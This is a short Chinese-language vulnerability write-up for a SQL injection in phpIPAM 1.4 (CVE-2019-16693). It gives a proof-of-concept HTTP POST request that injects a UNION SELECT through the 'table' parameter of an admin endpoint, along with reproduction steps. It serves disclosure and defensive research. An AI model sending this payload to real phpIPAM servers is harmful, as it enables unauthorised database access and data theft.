phpIPAM 1.4 SQL注入漏洞分析与利用

本文详细分析了phpIPAM 1.4版本中存在的SQL注入漏洞(CVE-2019-16693),提供了完整的漏洞原理、PoC验证请求以及复现步骤,适用于安全研究人员进行漏洞验证与防护参考。

漏洞标题:phpIPAM 1.4 - SQL注入

日期:2025-11-25

漏洞作者:CodeSecLab

供应商主页:https://github.com/phpipam/phpipam/

软件链接:https://github.com/phpipam/phpipam/

版本:1.4

测试环境:Windows

CVE编号:CVE-2019-16693

漏洞证明(PoC)

在执行PoC之前,请确保拥有有效的用户会话。 

1
2
3
4
5
6

POST /app/admin/custom-fields/order.php HTTP/1.1
Host: phpipam
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid_session_id>

table=test_table%60+UNION+SELECT+1%2C2%2C3+--+&current=non-empty&next=non-empty&action=add

复现步骤

  1. 以管理员用户身份登录。
  2. 使用Burp Suite等Web代理工具拦截并发送恶意请求,确保请求中包含有效的会话Cookie。
  3. 观察结果。
comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次